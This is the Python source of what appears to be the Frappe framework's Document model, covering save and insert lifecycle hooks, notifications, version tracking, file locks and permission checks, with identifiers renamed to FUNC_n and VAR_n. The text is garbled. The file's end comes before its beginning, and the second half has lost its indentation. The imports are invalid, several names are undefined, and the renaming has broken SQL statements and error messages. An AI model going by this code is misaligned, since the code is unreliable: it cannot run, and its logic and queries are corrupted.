		if VAR_24 and table_field.options == VAR_24:
			return self.get(table_field.fieldname)
		field_value = self.get(table_field.fieldname)
		if isinstance(field_value, list):
			rows.extend(field_value)
	return rows
def FUNC_42(self, VAR_25, *VAR_0, **VAR_1):
	"""Run controller method *VAR_25* together with its doc-event hooks.

	Also triggers notifications, webhooks and server scripts for the event.
	"""
	if "flags" in VAR_1:
		del VAR_1["flags"]

	if hasattr(self, VAR_25) and hasattr(getattr(self, VAR_25), "__call__"):
		# the controller defines this method: call it through a shim
		VAR_72 = lambda self, *VAR_0, **VAR_1: getattr(self, VAR_25)(*VAR_0, **VAR_1)
	else:
		# no such controller method: still run hooks, with a no-op base
		VAR_72 = lambda self, *VAR_0, **VAR_1: None

	VAR_72.__name__ = str(VAR_25)
	VAR_66 = CLASS_0.hook(VAR_72)(self, *VAR_0, **VAR_1)

	self.run_notifications(VAR_25)
	run_webhooks(self, VAR_25)
	run_server_script_for_doc_event(self, VAR_25)

	return VAR_66
def FUNC_43(self, VAR_25, *VAR_0, **VAR_1):
	"""Alias for :meth:`run_method` (kept for backward compatibility)."""
	return self.run_method(VAR_25, *VAR_0, **VAR_1)
def FUNC_44(self, VAR_25):
	"""Evaluate Notification documents that listen for event *VAR_25*.

	Enabled notifications are cached per doctype; each alert runs at most
	once per document save cycle.
	"""
	if (frappe.flags.in_import and frappe.flags.mute_emails) or frappe.flags.in_patch or frappe.flags.in_install:
		return

	if self.flags.notifications_executed==None:
		self.flags.notifications_executed = []

	from frappe.email.doctype.notification.notification import evaluate_alert

	if self.flags.notifications == None:
		# load (and cache) the enabled notifications for this doctype
		VAR_88 = frappe.cache().hget('notifications', self.doctype)
		if VAR_88==None:
			VAR_88 = frappe.get_all('Notification', fields=['name', 'event', 'method'],
				filters={'enabled': 1, 'document_type': self.doctype})
			frappe.cache().hset('notifications', self.doctype, VAR_88)
		self.flags.notifications = VAR_88

	if not self.flags.notifications:
		return

	def FUNC_82(VAR_67):
		# evaluate each alert only once per document lifecycle
		if not VAR_67.name in self.flags.notifications_executed:
			evaluate_alert(self, VAR_67.name, VAR_67.event)
			self.flags.notifications_executed.append(VAR_67.name)

	# map controller method names to Notification event names
	VAR_68 = {
		"on_update": "Save",
		"after_insert": "New",
		"on_submit": "Submit",
		"on_cancel": "Cancel"
	}

	if not self.flags.in_insert:
		# value-change alerts don't fire on freshly inserted documents
		VAR_68['on_change'] = 'Value Change'

	for VAR_67 in self.flags.notifications:
		VAR_89 = VAR_68.get(VAR_25, None)
		if VAR_89 and VAR_67.event == VAR_89:
			FUNC_82(VAR_67)
		elif VAR_67.event=='Method' and VAR_25 == VAR_67.method:
			FUNC_82(VAR_67)
@FUNC_2.__func__
def FUNC_45(self):
	"""Set docstatus to 1 (Submitted) and save; whitelisted for RPC."""
	self.docstatus = 1
	self.save()
@FUNC_2.__func__
def FUNC_46(self):
	"""Set docstatus to 2 (Cancelled) and save; whitelisted for RPC."""
	self.docstatus = 2
	self.save()
@FUNC_2.__func__
def FUNC_47(self):
	"""Public, whitelisted entry point for submitting this document."""
	self._submit()
@FUNC_2.__func__
def FUNC_48(self):
	"""Public, whitelisted entry point for cancelling this document."""
	self._cancel()
def FUNC_49(self, VAR_11=False):
	"""Delete this document from the database.

	Args:
		VAR_11: when True, skip permission checks during deletion.
	"""
	# BUG FIX: `ignore_permissions` was an undefined name (NameError);
	# forward this method's own VAR_11 flag instead.
	frappe.delete_doc(self.doctype, self.name, VAR_11=VAR_11, flags=self.flags)
def FUNC_50(self):
	"""Run the before-save lifecycle methods for the current ``_action``."""
	self.load_doc_before_save()
	self.reset_seen()

	# validation applies when saving or submitting, unless explicitly skipped
	if self._action in ("save", "submit"):
		self.run_method("before_validate")

	if self.flags.ignore_validate:
		return

	if self._action=="save":
		self.run_method("validate")
		self.run_method("before_save")

	elif self._action=="submit":
		self.run_method("validate")
		self.run_method("before_submit")

	elif self._action=="cancel":
		self.run_method("before_cancel")

	elif self._action=="update_after_submit":
		self.run_method("before_update_after_submit")

	self.set_title_field()
def FUNC_51(self):
	"""Load the current DB state into ``_doc_before_save`` (None for new docs
	or when the DB row is missing)."""
	self._doc_before_save = None
	if self.is_new():
		return
	try:
		self._doc_before_save = frappe.get_doc(self.doctype, self.name)
	except frappe.DoesNotExistError:
		self._doc_before_save = None
		frappe.clear_last_message()
def FUNC_52(self):
	"""Run the after-save lifecycle (on_update/on_submit/...), then clear
	caches, emit realtime updates, and write a Version record."""
	VAR_69 = self.get_doc_before_save()  # NOTE(review): fetched but unused here

	if self._action=="save":
		self.run_method("on_update")
	elif self._action=="submit":
		self.run_method("on_update")
		self.run_method("on_submit")
	elif self._action=="cancel":
		self.run_method("on_cancel")
		self.check_no_back_links_exist()
	elif self._action=="update_after_submit":
		self.run_method("on_update_after_submit")

	self.clear_cache()
	self.notify_update()
	update_global_search(self)
	self.save_version()
	self.run_method('on_change')

	# unregister from the "currently saving" list set during pre-save
	if (self.doctype, self.name) in frappe.flags.currently_saving:
		frappe.flags.currently_saving.remove((self.doctype, self.name))

	self.latest = None
def FUNC_53(self):
	"""Drop this document from the local document cache."""
	frappe.clear_document_cache(self.doctype, self.name)
def FUNC_54(self):
	"""Reset the "_seen" list to only the session user (if track_seen is on)."""
	if getattr(self.meta, 'track_seen', False):
		frappe.db.set_value(self.doctype, self.name, "_seen", json.dumps([frappe.session.user]), VAR_27=False)
def FUNC_55(self):
	"""Publish realtime "doc_update" (and "list_update") events for this doc."""
	if frappe.flags.in_patch: return

	frappe.publish_realtime("doc_update", {"modified": self.modified, "doctype": self.doctype, "name": self.name},
		VAR_2=self.doctype, docname=self.name, after_commit=True)

	# list views only exist for regular, writable, non-child doctypes
	if not self.meta.get("read_only") and not self.meta.get("issingle") and \
		not self.meta.get("istable"):
		VAR_90 = {
			"doctype": self.doctype,
			"name": self.name,
			"user": frappe.session.user
		}
		frappe.publish_realtime("list_update", VAR_90, after_commit=True)
def FUNC_56(self, VAR_18, VAR_26=None, VAR_27=True, VAR_28=False, VAR_29=False):
	"""Set field value(s) directly in the database and fire change hooks.

	Args:
		VAR_18: fieldname, or a dict of fieldname -> value.
		VAR_26: the value (ignored when VAR_18 is a dict).
		VAR_27: when True, also bump modified/modified_by.
		VAR_28: when True, publish a realtime update afterwards.
		VAR_29: when True, commit the transaction immediately.
	"""
	if isinstance(VAR_18, dict):
		self.update(VAR_18)
	else:
		self.set(VAR_18, VAR_26)

	if VAR_27 and (self.doctype, self.name) not in frappe.flags.currently_saving:
		# bump modification metadata unless a full save is in progress
		self.set("modified", now())
		self.set("modified_by", frappe.session.user)

	self.load_doc_before_save()
	self.run_method('before_change')
	# BUG FIX: `update_modified` was an undefined name (NameError);
	# forward this method's own VAR_27 flag instead.
	frappe.db.set_value(self.doctype, self.name, VAR_18, VAR_26,
		self.modified, self.modified_by, VAR_27=VAR_27)

	self.run_method('on_change')

	if VAR_28:
		self.notify_update()

	self.clear_cache()
	if VAR_29:
		frappe.db.commit()
def FUNC_57(self, VAR_18):
	"""Return *VAR_18*'s current value straight from the database."""
	return frappe.db.get_value(self.doctype, self.name, VAR_18)
def FUNC_58(self):
	"""On cancel: throw if any live document still links to this one."""
	from frappe.model.delete_doc import check_if_doc_is_linked, check_if_doc_is_dynamically_linked
	if not self.flags.ignore_links:
		check_if_doc_is_linked(self, VAR_25="Cancel")
		check_if_doc_is_dynamically_linked(self, VAR_25="Cancel")
def FUNC_59(self):
	"""Write a Version record capturing the changes made by this save."""
	if (not getattr(self.meta, 'track_changes', False)
		or self.doctype == 'Version'
		or self.flags.ignore_version
		or frappe.flags.in_install
		or (not self._doc_before_save and frappe.flags.in_patch)):
		return

	VAR_70 = frappe.new_doc('Version')

	if not self._doc_before_save:
		# no snapshot: this save is a fresh insert
		VAR_70.for_insert(self)
		VAR_70.insert(VAR_11=True)
	elif VAR_70.set_diff(self._doc_before_save, self):
		# only record a Version when something actually changed
		VAR_70.insert(VAR_11=True)
		if not frappe.flags.in_migrate:
			# modifying a doc subscribes the user to it
			follow_document(self.doctype, self.name, frappe.session.user)
@staticmethod
def FUNC_60(VAR_6):
	"""Decorator: compose a controller method with its registered doc-event
	hooks.

	The decorated method runs first, then every hook registered for the
	same method name (doctype-specific plus wildcard "*" hooks); all
	return values are folded into ``self._return_value``, which is also
	the composed function's return value.
	"""
	def FUNC_83(self, VAR_71):
		# fold a hook's return value into the accumulated _return_value;
		# dict results are merged, others overwrite (falsy keeps previous)
		if isinstance(VAR_71, dict):
			if not self.get("_return_value"):
				self._return_value = {}
			self._return_value.update(VAR_71)
		else:
			self._return_value = VAR_71 or self.get("_return_value")

	def FUNC_84(VAR_72, *VAR_73):
		# chain the original method with its hook functions
		def FUNC_86(self, VAR_25, *VAR_0, **VAR_1):
			FUNC_83(self, VAR_72(self, *VAR_0, **VAR_1))
			for VAR_6 in VAR_73:
				FUNC_83(self, VAR_6(self, VAR_25, *VAR_0, **VAR_1))
			return self._return_value
		return FUNC_86

	def FUNC_85(self, *VAR_0, **VAR_1):
		VAR_73 = []
		VAR_25 = VAR_6.__name__
		VAR_91 = frappe.get_doc_hooks()
		# collect hooks for this doctype plus wildcard ("*") hooks
		for handler in VAR_91.get(self.doctype, {}).get(VAR_25, []) \
			+ VAR_91.get("*", {}).get(VAR_25, []):
			VAR_73.append(frappe.get_attr(handler))
		VAR_92 = FUNC_84(VAR_6, *VAR_73)
		return VAR_92(self, VAR_25, *VAR_0, **VAR_1)

	return FUNC_85
def FUNC_61(self, VAR_25):
	"""Ensure *VAR_25* names an existing, whitelisted method.

	Raises:
		NotFound: when no such attribute exists on the document.
		Forbidden: when the method is not whitelisted for RPC.
	"""
	handler = getattr(self, VAR_25, None)
	if not handler:
		raise NotFound("Method {0} not found".format(VAR_25))
	if not getattr(handler, "whitelisted", False):
		raise Forbidden("Method {0} not whitelisted".format(VAR_25))
def FUNC_62(self, VAR_18, VAR_30, VAR_31, VAR_32=None, VAR_33=None):
	"""Assert that field *VAR_18* of *VAR_32* (default: self) compares to
	*VAR_31* using operator *VAR_30*; show/raise an error otherwise.

	Args:
		VAR_18: fieldname to check.
		VAR_30: comparison operator understood by ``frappe.compare``.
		VAR_31: expected value (cast to the field's type before comparing).
		VAR_32: document to check; defaults to this document.
		VAR_33: exception to raise on failure (defaults to a plain throw).
	"""
	# human-readable names for the non-symbol operators
	VAR_74 = {
		"in": _("one of"),
		"not in": _("none of"),
		"^": _("beginning with"),
	}

	if not VAR_32:
		# BUG FIX: the fallback was assigned to an unrelated local (`doc`),
		# leaving VAR_32 None and crashing on the attribute accesses below.
		VAR_32 = self

	VAR_75 = VAR_32.get_value(VAR_18)
	VAR_19 = VAR_32.meta.get_field(VAR_18)
	VAR_31 = VAR_32.cast(VAR_31, VAR_19)

	if not frappe.compare(VAR_75, VAR_30, VAR_31):
		VAR_93 = VAR_32.meta.get_label(VAR_18)
		# BUG FIX: `condition` was undefined (NameError); fall back to the
		# raw operator when it has no friendly name.
		VAR_94 = VAR_74.get(VAR_30, VAR_30)

		if VAR_32.parentfield:
			VAR_87 = _("Incorrect VAR_26 in row {0}: {1} must be {2} {3}").format(VAR_32.idx, VAR_93, VAR_94, VAR_31)
		else:
			VAR_87 = _("Incorrect VAR_26: {0} must be {1} {2}").format(VAR_93, VAR_94, VAR_31)

		# BUG FIX: `raise_exception` was undefined (NameError); use the
		# VAR_33 parameter of this method.
		msgprint(VAR_87, VAR_33=VAR_33 or True)
def FUNC_63(self, VAR_34, VAR_33=None):
	"""Throw (EmptyTableError by default) when child table *VAR_34* is empty."""
	rows = self.get(VAR_34)
	if isinstance(rows, list) and len(rows) > 0:
		return
	label = self.meta.get_label(VAR_34)
	frappe.throw(_("Table {0} cannot be empty").format(label), VAR_33 or frappe.EmptyTableError)
def FUNC_64(self, VAR_32, VAR_35=None):
	"""Round the float-like fields of row *VAR_32* to their field precision.

	Args:
		VAR_32: the (child) document whose values are rounded in place.
		VAR_35: iterable of fieldnames; defaults to all Currency/Float/
			Percent fields of *VAR_32*'s doctype.
	"""
	if not VAR_35:
		# BUG FIX: the computed default was assigned to an unused local
		# (`fieldnames`), so the loop below iterated over None.
		VAR_35 = (VAR_19.fieldname for VAR_19 in
			VAR_32.meta.get("fields", {"fieldtype": ["in", ["Currency", "Float", "Percent"]]}))

	for VAR_18 in VAR_35:
		VAR_32.set(VAR_18, flt(VAR_32.get(VAR_18), self.precision(VAR_18, VAR_32.parentfield)))
def FUNC_65(self):
	"""Return the desk form route for this document (/app/Form/<doctype>/<name>)."""
	return "/app/Form/{VAR_2}/{VAR_3}".format(VAR_2=self.doctype, VAR_3=self.name)
def FUNC_66(self, VAR_36='Comment', VAR_37=None, VAR_38=None, VAR_39=None, VAR_40=None, VAR_41=None):
	"""Create a Comment document linked to this document.

	Args:
		VAR_36: comment type (e.g. 'Comment', 'Like', 'Shared').
		VAR_37: the comment text; defaults to the comment type.
		VAR_38: email of the commenting user; defaults to the session user.
		VAR_39: optional doctype to cross-link the comment with.
		VAR_40: optional name of the cross-linked document.
		VAR_41: display name of the commenter.

	Returns:
		The inserted Comment document.
	"""
	VAR_66 = frappe.get_doc({
		"doctype":"Comment",
		'comment_type': VAR_36,
		"comment_email": VAR_38 or frappe.session.user,
		"comment_by": VAR_41,
		"reference_doctype": self.doctype,
		"reference_name": self.name,
		"content": VAR_37 or VAR_36,
		"link_doctype": VAR_39,
		"link_name": VAR_40
	}).insert(VAR_11=True)
	return VAR_66
def FUNC_67(self, VAR_42=None):
	"""Mark this document as seen by *VAR_42* (defaults to the session user),
	when the doctype tracks "seen" state."""
	if not VAR_42:
		# BUG FIX: the default was assigned to an unrelated local (`user`),
		# leaving the VAR_42 parameter None.
		VAR_42 = frappe.session.user

	if self.meta.track_seen:
		VAR_95 = self.get('_seen') or []
		VAR_95 = frappe.parse_json(VAR_95)

		if VAR_42 not in VAR_95:
			# BUG FIX: `_seen` was an undefined name (NameError); append to
			# the parsed list instead.
			VAR_95.append(VAR_42)
			frappe.db.set_value(self.doctype, self.name, '_seen', json.dumps(VAR_95), VAR_27=False)
			frappe.local.flags.commit = True
def FUNC_68(self, VAR_42=None):
	"""Record a View Log entry for this document (when track_views is on)."""
	if not VAR_42:
		# BUG FIX: the default was assigned to an unused local (`user`),
		# leaving the VAR_42 parameter None.
		VAR_42 = frappe.session.user

	if hasattr(self.meta, 'track_views') and self.meta.track_views:
		frappe.get_doc({
			"doctype": "View Log",
			"viewed_by": frappe.session.user,
			"reference_doctype": self.doctype,
			"reference_name": self.name,
		}).insert(VAR_11=True)
		frappe.local.flags.commit = True
def FUNC_69(self):
	"""Return a SHA-224 hex digest of the creation timestamp (lock key)."""
	return hashlib.sha224(get_datetime_str(self.creation).encode()).hexdigest()
def FUNC_70(self):
	"""Return the list of users who liked this document (empty if none)."""
	raw = getattr(self, "_liked_by", None)
	if not raw:
		return []
	return json.loads(raw)
def FUNC_71(self, VAR_43, VAR_26):
	"""Store *VAR_26* under *VAR_43* in the transient ``__onload`` dict
	(sent to the client, never persisted)."""
	if not self.get("__onload"):
		self.set("__onload", frappe._dict())
	self.get("__onload")[VAR_43] = VAR_26
def FUNC_72(self, VAR_43=None):
	"""Return the transient ``__onload`` dict, or one entry when *VAR_43*
	is given."""
	if VAR_43:
		return self.get('__onload')[VAR_43]
	return self.get("__onload", frappe._dict())
def FUNC_73(self, VAR_4, **VAR_1):
	"""Queue *VAR_4* (e.g. "submit") for background execution.

	Prefers the private ``_<action>`` controller method when it exists.

	Raises:
		frappe.ValidationError (via frappe.throw): when the document is
		already locked/queued.
	"""
	from frappe.utils.background_jobs import enqueue

	if hasattr(self, '_' + VAR_4):
		# BUG FIX: the private-method name was assigned to an unused local
		# (`action`), so the public name was always enqueued.
		VAR_4 = '_' + VAR_4

	if file_lock.lock_exists(self.get_signature()):
		frappe.throw(_('This document is currently queued for execution. Please try again'),
			title=_('Document Queued'))

	self.lock()
	enqueue('frappe.model.document.execute_action', VAR_2=self.doctype, VAR_3=self.name,
		VAR_4=VAR_4, **VAR_1)
def FUNC_74(self, VAR_44=None):
	"""Acquire this document's file-based lock.

	Args:
		VAR_44: seconds to keep retrying (1s apart) before giving up.

	Raises:
		frappe.DocumentLockedError: when the lock is still held after
		the timeout (or immediately, when no timeout is given).
	"""
	VAR_77 = self.get_signature()
	if file_lock.lock_exists(VAR_77):
		VAR_96 = True
		if VAR_44:
			# poll once per second until the lock clears or we time out
			for i in range(VAR_44):
				time.sleep(1)
				if not file_lock.lock_exists(VAR_77):
					VAR_96 = False
					break
		if VAR_96:
			raise frappe.DocumentLockedError
	file_lock.create_lock(VAR_77)
def FUNC_75(self):
	"""Release this document's file-based lock."""
	file_lock.delete_lock(self.get_signature())
def FUNC_76(self, VAR_45, VAR_46):
	"""Throw InvalidDates when the *VAR_46* date lies before *VAR_45*.

	Args:
		VAR_45: fieldname of the "from" date.
		VAR_46: fieldname of the "to" date.
	"""
	if date_diff(self.get(VAR_46), self.get(VAR_45)) < 0:
		frappe.throw(_('{0} must be after {1}').format(
			frappe.bold(self.meta.get_label(VAR_46)),
			frappe.bold(self.meta.get_label(VAR_45)),
		), frappe.exceptions.InvalidDates)
def FUNC_77(self):
	"""Return the set of users with a non-cancelled ToDo assignment on this doc."""
	assignments = frappe.get_all('ToDo',
		fields=['owner'],
		filters={
			'reference_type': self.doctype,
			'reference_name': self.name,
			'status': ('!=', 'Cancelled'),
		})
	return {assignment.owner for assignment in assignments}
def FUNC_78(self, VAR_47):
	"""Attach tag *VAR_47* to this document."""
	from frappe.desk.doctype.tag.tag import DocTags
	DocTags(self.doctype).add(self.name, VAR_47)
def FUNC_79(self):
	"""Return this document's tags as a list (leading empty entry stripped)."""
	from frappe.desk.doctype.tag.tag import DocTags
	return DocTags(self.doctype).get_tags(self.name).split(",")[1:]
def FUNC_1(VAR_2, VAR_3, VAR_4, **VAR_1):
	"""Execute *VAR_4* on document (*VAR_2*, *VAR_3*) inside a background job.

	On failure the transaction is rolled back and the error is recorded
	as a comment on the document.
	"""
	VAR_32 = frappe.get_doc(VAR_2, VAR_3)
	VAR_32.unlock()
	try:
		getattr(VAR_32, VAR_4)(**VAR_1)
	except Exception:
		frappe.db.rollback()

		# reuse the last UI message as the failure reason, else the traceback
		if frappe.local.message_log:
			VAR_87 = json.loads(frappe.local.message_log[-1]).get('message')
		else:
			VAR_87 = '<pre><code>' + frappe.get_traceback() + '</pre></code>'

		VAR_32.add_comment('Comment', _('Action Failed') + '<br><br>' + VAR_87)
		VAR_32.notify_update()
|
from __future__ import unicode_literals, print_function
import .frappe
import time
from frappe import _, msgprint, FUNC_61
from frappe.utils import .flt, cstr, now, get_datetime_str, file_lock, date_diff
from frappe.model.base_document import BaseDocument, get_controller
from frappe.model.naming import .set_new_name
from six import iteritems, string_types
from werkzeug.exceptions import NotFound, Forbidden
import hashlib, json
from frappe.model import optional_fields, VAR_82
from frappe.model.workflow import .validate_workflow
from frappe.model.workflow import set_workflow_state_on_action
from frappe.utils.global_search import update_global_search
from frappe.integrations.doctype.webhook import run_webhooks
from frappe.desk.form.document_follow import .follow_document
from frappe.core.doctype.server_script.server_script_utils import run_server_script_for_doc_event
def FUNC_0(*VAR_0, **VAR_1):
	"""Return a controller instance for the requested doctype.

	Accepts an existing document (returned unchanged), a doctype name as
	the first positional argument, or a dict / keyword arguments that
	contain at least a "doctype" key.

	Raises:
		ValueError: when the arguments don't identify a doctype.
		ImportError: when no controller class can be resolved.
	"""
	if VAR_0:
		if isinstance(VAR_0[0], BaseDocument):
			# already a document: pass it through untouched
			return VAR_0[0]
		elif isinstance(VAR_0[0], string_types):
			VAR_2 = VAR_0[0]
		elif isinstance(VAR_0[0], dict):
			# first positional argument is the kwargs dict itself
			VAR_1 = VAR_0[0]
		else:
			raise ValueError('First non keyword argument must be a string or dict')

	if len(VAR_0) < 2 and VAR_1:
		if 'doctype' in VAR_1:
			VAR_2 = VAR_1['doctype']
		else:
			raise ValueError('"doctype" is a required key')

	VAR_5 = get_controller(VAR_2)
	if VAR_5:
		return VAR_5(*VAR_0, **VAR_1)

	raise ImportError(VAR_2)
class CLASS_0(BaseDocument):
def __init__(self, *VAR_0, **VAR_1):
self.doctype = self.name = None
self._default_new_docs = {}
self.flags = frappe._dict()
if VAR_0 and VAR_0[0] and isinstance(VAR_0[0], string_types):
if len(VAR_0)==1:
self.doctype = self.name = VAR_0[0]
else:
self.doctype = VAR_0[0]
if isinstance(VAR_0[1], dict):
self.name = frappe.db.get_value(VAR_0[0], VAR_0[1], "name")
if self.name is None:
frappe.throw(_("{0} {1} not found").format(_(VAR_0[0]), VAR_0[1]),
frappe.DoesNotExistError)
else:
self.name = VAR_0[1]
if 'for_update' in VAR_1:
self.flags.for_update = VAR_1.get('for_update')
self.load_from_db()
return
if VAR_0 and VAR_0[0] and isinstance(VAR_0[0], dict):
VAR_1 = VAR_0[0]
if VAR_1:
super(CLASS_0, self).__init__(VAR_1)
self.init_valid_columns()
else:
raise ValueError('Illegal arguments')
@staticmethod
def FUNC_2(VAR_6):
frappe.whitelist()(VAR_6)
return VAR_6
def FUNC_3(self):
self.load_from_db()
def FUNC_4(self):
if not getattr(self, "_metaclass", False) and self.meta.issingle:
VAR_81 = frappe.db.get_singles_dict(self.doctype)
if not VAR_81:
single_doc = frappe.new_doc(self.doctype).as_dict()
VAR_81["name"] = self.doctype
del VAR_81["__islocal"]
super(CLASS_0, self).__init__(VAR_81)
self.init_valid_columns()
self._fix_numeric_types()
else:
VAR_21 = frappe.db.get_value(self.doctype, self.name, "*", as_dict=1, for_update=self.flags.for_update)
if not VAR_21:
frappe.throw(_("{0} {1} not found").format(_(self.doctype), self.name), frappe.DoesNotExistError)
super(CLASS_0, self).__init__(VAR_21)
if self.name=="DocType" and self.doctype=="DocType":
from frappe.model.meta import DOCTYPE_TABLE_FIELDS
VAR_82 = DOCTYPE_TABLE_FIELDS
else:
VAR_82 = self.meta.get_table_fields()
for VAR_19 in VAR_82:
VAR_52 = frappe.db.get_values(VAR_19.options,
{"parent": self.name, "parenttype": self.doctype, "parentfield": VAR_19.fieldname},
"*", as_dict=True, order_by="idx asc")
if VAR_52:
self.set(VAR_19.fieldname, VAR_52)
else:
self.set(VAR_19.fieldname, [])
if hasattr(self, "__setup__"):
self.__setup__()
def FUNC_5(self):
if not getattr(self, "latest", None):
self.latest = frappe.get_doc(self.doctype, self.name)
return self.latest
def FUNC_6(self, VAR_7='read', VAR_8=None):
if not self.has_permission(VAR_7):
self.raise_no_permission_to(VAR_8 or VAR_7)
def FUNC_7(self, VAR_7="read", VAR_9=False):
if self.flags.ignore_permissions:
return True
return frappe.has_permission(self.doctype, VAR_7, self, VAR_9=verbose)
def FUNC_8(self, VAR_10):
frappe.flags.error_message = _('Insufficient Permission for {0}').format(self.doctype)
raise frappe.PermissionError
def FUNC_9(self, VAR_11=None, VAR_12=None, VAR_13=False,
VAR_14=None, VAR_15=None, VAR_16=True):
if self.flags.in_print:
return
self.flags.notifications_executed = []
if VAR_11!=None:
self.flags.ignore_permissions = VAR_11
if VAR_12!=None:
self.flags.ignore_links = VAR_12
if VAR_14!=None:
self.flags.ignore_mandatory = VAR_14
self.set("__islocal", True)
self.check_permission("create")
self._set_defaults()
self.set_user_and_timestamp()
self.set_docstatus()
self.check_if_latest()
self.run_method("before_insert")
self._validate_links()
self.set_new_name(VAR_15=set_name, VAR_16=set_child_names)
self.set_parent_in_children()
self.validate_higher_perm_levels()
self.flags.in_insert = True
self.run_before_save_methods()
self._validate()
self.set_docstatus()
self.flags.in_insert = False
if getattr(self.meta, "issingle", 0):
self.update_single(self.get_valid_dict())
else:
try:
self.db_insert()
except frappe.DuplicateEntryError as e:
if not VAR_13:
raise e
for VAR_21 in self.get_all_children():
VAR_21.db_insert()
self.run_method("after_insert")
self.flags.in_insert = True
if self.get("amended_from"):
self.copy_attachments_from_amended_from()
self.flags.update_log_for_doc_creation = True
self.run_post_save_methods()
self.flags.in_insert = False
if hasattr(self, "__islocal"):
delattr(self, "__islocal")
if hasattr(self, "__unsaved"):
delattr(self, "__unsaved")
if not (frappe.flags.in_migrate or frappe.local.flags.in_install or frappe.flags.in_setup_wizard):
follow_document(self.doctype, self.name, frappe.session.user)
return self
def FUNC_10(self, *VAR_0, **VAR_1):
return self._save(*VAR_0, **VAR_1)
def FUNC_11(self, VAR_11=None, VAR_17=None):
if self.flags.in_print:
return
self.flags.notifications_executed = []
if VAR_11!=None:
self.flags.ignore_permissions = VAR_11
self.flags.ignore_version = frappe.flags.in_test if VAR_17 is None else VAR_17
if self.get("__islocal") or not self.get("name"):
self.insert()
return
self.check_permission("write", "save")
self.set_user_and_timestamp()
self.set_docstatus()
self.check_if_latest()
self.set_parent_in_children()
self.set_name_in_children()
self.validate_higher_perm_levels()
self._validate_links()
self.run_before_save_methods()
if self._action != "cancel":
self._validate()
if self._action == "update_after_submit":
self.validate_update_after_submit()
self.set_docstatus()
if self.meta.issingle:
self.update_single(self.get_valid_dict())
else:
self.db_update()
self.update_children()
self.run_post_save_methods()
if hasattr(self, "__unsaved"):
delattr(self, "__unsaved")
return self
def FUNC_12(self):
from frappe.desk.form.load import get_attachments
for attach_item in get_attachments(self.doctype, self.amended_from):
VAR_83 = frappe.get_doc({
"doctype": "File",
"file_url": attach_item.file_url,
"file_name": attach_item.file_name,
"attached_to_name": self.name,
"attached_to_doctype": self.doctype,
"folder": "Home/Attachments"})
VAR_83.save()
def FUNC_13(self):
for VAR_19 in self.meta.get_table_fields():
self.update_child_table(VAR_19.fieldname, VAR_19)
def FUNC_14(self, VAR_18, VAR_19=None):
VAR_50 = []
if not VAR_19:
VAR_19 = self.meta.get_field(VAR_18)
for VAR_21 in self.get(VAR_19.fieldname):
VAR_21.db_update()
VAR_50.append(VAR_21.name)
if VAR_19.options in (self.flags.ignore_children_type or []):
return
if VAR_50:
VAR_84 = frappe.db.sql("""select VAR_3 from `tab{0}` where parent=%s
and VAR_24=%s and VAR_36=%s
and VAR_3 not in ({1})""".format(VAR_19.options, ','.join(['%s'] * len(VAR_50))),
[self.name, self.doctype, VAR_18] + VAR_50)
if len(VAR_84) > 0:
frappe.db.sql("""delete from `tab{0}` where VAR_3 in ({1})""".format(VAR_19.options,
','.join(['%s'] * len(VAR_84))), tuple(row[0] for row in VAR_84))
else:
frappe.db.sql("""delete from `tab{0}` where parent=%s
and VAR_24=%s and VAR_36=%s""".format(VAR_19.options),
(self.name, self.doctype, VAR_18))
def FUNC_15(self):
return getattr(self, '_doc_before_save', None)
def FUNC_16(self, VAR_18):
VAR_51 = self.get_doc_before_save()
return VAR_51.get(VAR_18)!=self.get(VAR_18) if VAR_51 else True
def FUNC_17(self, VAR_20=False, VAR_15=None, VAR_16=True):
if self.flags.name_set and not VAR_20:
return
if self.get("__newname"):
self.name = self.get("__newname")
self.flags.name_set = True
return
if VAR_15:
self.name = VAR_15
else:
FUNC_17(self)
if VAR_16:
for VAR_21 in self.get_all_children():
FUNC_17(VAR_21)
self.flags.name_set = True
def FUNC_18(self):
return self.get(self.meta.get_title_field())
def FUNC_19(self):
def FUNC_80():
VAR_85 = self.as_dict()
for VAR_45, VAR_26 in iteritems(VAR_85):
if VAR_26==None:
VAR_85[VAR_45] = ""
return VAR_85
if self.meta.get("title_field")=="title":
VAR_19 = self.meta.get_field(self.meta.title_field)
if VAR_19.options:
self.set(VAR_19.fieldname, VAR_19.options.format(**FUNC_80()))
elif self.is_new() and not self.get(VAR_19.fieldname) and VAR_19.default:
self.set(VAR_19.fieldname, VAR_19.default.format(**FUNC_80()))
def FUNC_20(self, VAR_21):
frappe.db.sql("""delete from `tabSingles` where VAR_2=%s""", self.doctype)
for field, VAR_26 in iteritems(VAR_21):
if field != "doctype":
frappe.db.sql("""insert into `tabSingles` (VAR_2, field, VAR_26)
VAR_85 (%s, %s, %s)""", (self.doctype, field, VAR_26))
if self.doctype in frappe.db.value_cache:
del frappe.db.value_cache[self.doctype]
def FUNC_21(self):
self._original_modified = self.modified
self.modified = now()
self.modified_by = frappe.session.user
if not self.creation:
self.creation = self.modified
if not self.owner:
self.owner = self.modified_by
for VAR_21 in self.get_all_children():
VAR_21.modified = self.modified
VAR_21.modified_by = self.modified_by
if not VAR_21.owner:
VAR_21.owner = self.owner
if not VAR_21.creation:
VAR_21.creation = self.creation
frappe.flags.currently_saving.append((self.doctype, self.name))
def FUNC_22(self):
if self.docstatus==None:
self.docstatus=0
for VAR_21 in self.get_all_children():
VAR_21.docstatus = self.docstatus
def FUNC_23(self):
self._validate_mandatory()
self._validate_data_fields()
self._validate_selects()
self._validate_non_negative()
self._validate_length()
self._extract_images_from_text_editor()
self._sanitize_content()
self._save_passwords()
self.validate_workflow()
VAR_52 = self.get_all_children()
for VAR_21 in VAR_52:
VAR_21._validate_data_fields()
VAR_21._validate_selects()
VAR_21._validate_non_negative()
VAR_21._validate_length()
VAR_21._extract_images_from_text_editor()
VAR_21._sanitize_content()
VAR_21._save_passwords()
if self.is_new():
for VAR_18 in optional_fields:
self.set(VAR_18, None)
else:
self.validate_set_only_once()
def FUNC_24(self):
def FUNC_81(VAR_19):
if self.parentfield:
return "{} {} #{}: {} {}".format(frappe.bold(_(self.doctype)),
_("Row"), self.idx, _("Value cannot be negative for"), frappe.bold(_(VAR_19.label)))
else:
return _("Value cannot be negative for {0}: {1}").format(_(VAR_19.parent), frappe.bold(_(VAR_19.label)))
for VAR_19 in self.meta.get('fields', {'non_negative': ('=', 1),
'fieldtype': ('in', ['Int', 'Float', 'Currency'])}):
if flt(self.get(VAR_19.fieldname)) < 0:
VAR_88 = FUNC_81(VAR_19)
frappe.throw(VAR_88, frappe.NonNegativeError, title=_("Negative Value"))
def FUNC_25(self):
